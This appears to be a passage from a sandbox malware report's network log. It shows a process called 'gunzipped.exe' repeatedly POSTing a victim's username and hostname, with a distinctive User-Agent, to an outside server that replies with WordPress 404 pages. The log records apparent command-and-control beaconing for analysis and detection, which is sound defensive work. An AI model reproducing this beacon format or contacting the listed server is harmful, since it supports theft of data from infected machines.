Apr 17, 2024 03:17:17.295347929 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:17.295392036 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:17.295439005 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49729	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:17.652364016 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:17.860613108 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:18.792915106 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:18.792979002 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:18.793018103 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:18.793055058 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:18.793097973 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:18.793138027 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:18.793176889 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:18.793215036 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:18.793256044 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:18.793349028 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49730	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:19.154294968 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:19.357424974 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:20.300321102 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:19 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:20.300359011 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:20.300395966 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:20.300436974 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:20.300472021 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:20.300508976 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:20.300546885 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:20.300584078 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:20.300622940 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:20.300661087 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49731	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:20.757055044 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
